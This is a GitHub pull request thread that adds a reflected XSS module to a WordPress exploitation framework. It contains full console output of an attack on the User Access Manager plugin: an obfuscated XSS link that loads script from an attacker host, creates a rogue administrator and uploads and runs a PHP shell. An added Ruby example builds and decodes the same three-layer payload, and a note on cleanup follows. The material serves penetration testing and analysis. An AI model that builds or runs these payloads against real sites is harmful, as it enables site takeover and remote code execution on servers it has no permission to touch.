rastating / wordpress-exploit-framework

A Ruby framework designed to aid in the penetration testing of WordPress systems.
https://rastating.github.io/wordpress-exploit-framework
GNU General Public License v3.0

Add "User access manager" reflected XSS module #38

Closed phyushin closed 7 years ago

phyushin commented 7 years ago

This module exploits the "user-access-manager" WordPress plugin.

Fixed in: 2.0.0

References:

http://www.defensecode.com/advisories/DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf

http://seclists.org/bugtraq/2017/May/31

WPVDBID:8814

Disclosure: 2017-05-11

Example output:

```
wpxf > use exploit/user_access_manager_reflected_xss_shell_upload

  [+] Loaded module: #<Wpxf::Exploit::UserAccessManagerReflectedXssShellUpload:0x00000001b19008>

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set host 192.168.0.47

  [+] Set host => 192.168.0.47

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set xss_host 192.168.0.220

  [+] Set xss_host => 192.168.0.220

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000001af1058>

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > check

  [!] Target appears to be vulnerable

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.47/wp-admin/admin.php?page=uam_usergroup&action=editGroup&id=%5C%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C50%2C50%2C48%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C109%2C86%2C65%2C69%2C116%2C121%2C103%2C114%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, sDoLTH:JbEcHpWrex
  [-] HTTP server stopped
  [-] Authenticating with WordPress using sDoLTH:JbEcHpWrex...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.47/wp-content/plugins/IdfccoQgun/WCWyiebhMp.php...
  [+] Result: www-data
  [+] Execution finished successfully

wpxf [exploit/user_access_manager_reflected_xss_shell_upload] >
```
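The URL the module prints above stacks three encoding layers on one reflected parameter: the `id` value of `admin.php?page=uam_usergroup&action=editGroup` is percent-encoded for the query string; inside it, `\"><script>` breaks out of the context the plugin echoes the parameter into and the script body is a `String.fromCharCode(...)` list, so the injected text contains no quotes or spaces; and the decoded list is `eval(decodeURIComponent(/.../.source))`, a percent-encoded JavaScript stager hidden in a regex literal. The stager only loads a second script from the `xss_host` HTTP server; the admin-creation logic lives there, which is why the module needs the server running when the victim admin clicks. The following Ruby is an added example, not code from wordpress-exploit-framework or from this PR: it rebuilds those three layers from the host, port and path values in the example output and decodes them again, so an analyst who finds such a link in a proxy log can read what the browser would run. The module and method names (`UamXssPayload`, `stager_js`, `obfuscate`, `build_url`, `decode_url`) are this example's own; the percent-encoding uses Ruby's `ERB::Util.url_encode`, which is assumed to match the module's encoding because it reproduces the printed URL byte for byte.

```ruby
require 'erb'
require 'uri'

# Added example (not wordpress-exploit-framework code). Host, port and path
# values below come from the example output; helper names are this example's own.
module UamXssPayload
  module_function

  # Layer 1: the JavaScript the hooked admin's browser executes. It appends a
  # <script> tag pointing at the attacker's HTTP server and carries no other
  # logic; the admin-creation script is fetched from that server.
  def stager_js(xss_host, xss_port, path)
    "var a = document.createElement(\"script\");" \
      "a.setAttribute(\"src\", \"http://#{xss_host}:#{xss_port}/#{path}\");" \
      "document.head.appendChild(a);"
  end

  # Layer 2: hide quotes and spaces. The stager is percent-encoded and smuggled
  # in as a regex literal's .source, then the whole expression becomes a
  # String.fromCharCode(...) list so the injected text is digits and commas.
  def obfuscate(js)
    inner = "eval(decodeURIComponent(/#{ERB::Util.url_encode(js)}/.source))"
    "eval(String.fromCharCode(#{inner.each_codepoint.to_a.join(',')}))"
  end

  # Layer 3: break out of the context the plugin reflects `id` into, open a
  # <script> tag, and percent-encode the whole value for the query string.
  def build_url(target_host, xss_host, xss_port, path)
    injected = "\\\"><script>#{obfuscate(stager_js(xss_host, xss_port, path))}</script>"
    "http://#{target_host}/wp-admin/admin.php?page=uam_usergroup&action=editGroup" \
      "&id=#{ERB::Util.url_encode(injected)}"
  end

  # Reverse all three layers of a URL in the above shape and return the stager
  # JavaScript, or nil when the `id` value is not built this way.
  def decode_url(url)
    return nil unless (query = URI(url).query)

    id = URI.decode_www_form(query).to_h['id']
    return nil unless id && (codes = id[/String\.fromCharCode\(([\d,]+)\)/, 1])

    inner = codes.split(',').map { |c| c.to_i.chr(Encoding::UTF_8) }.join
    enc = inner[%r{decodeURIComponent\(/(.*)/\.source\)}, 1]
    enc && URI.decode_www_form_component(enc)
  end
end

if $PROGRAM_NAME == __FILE__
  url = UamXssPayload.build_url('192.168.0.47', '192.168.0.220', 8080, 'mVAEtygr')
  puts url
  puts UamXssPayload.decode_url(url)
end
```

Two things worth noting from the output itself. The payload runs only when an authenticated administrator opens the link while the HTTP server on `http_server_bind_port` is reachable from that browser, so the target must be able to reach `xss_host`. And the run leaves two artifacts on the site that the output shows but the module does not remove: the new administrator account (`sDoLTH` here) and the uploaded plugin file under `wp-content/plugins/`; both belong in an engagement's cleanup list.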
rastating commented 7 years ago

Tested successfully and merged, thank you :1st_place_medal: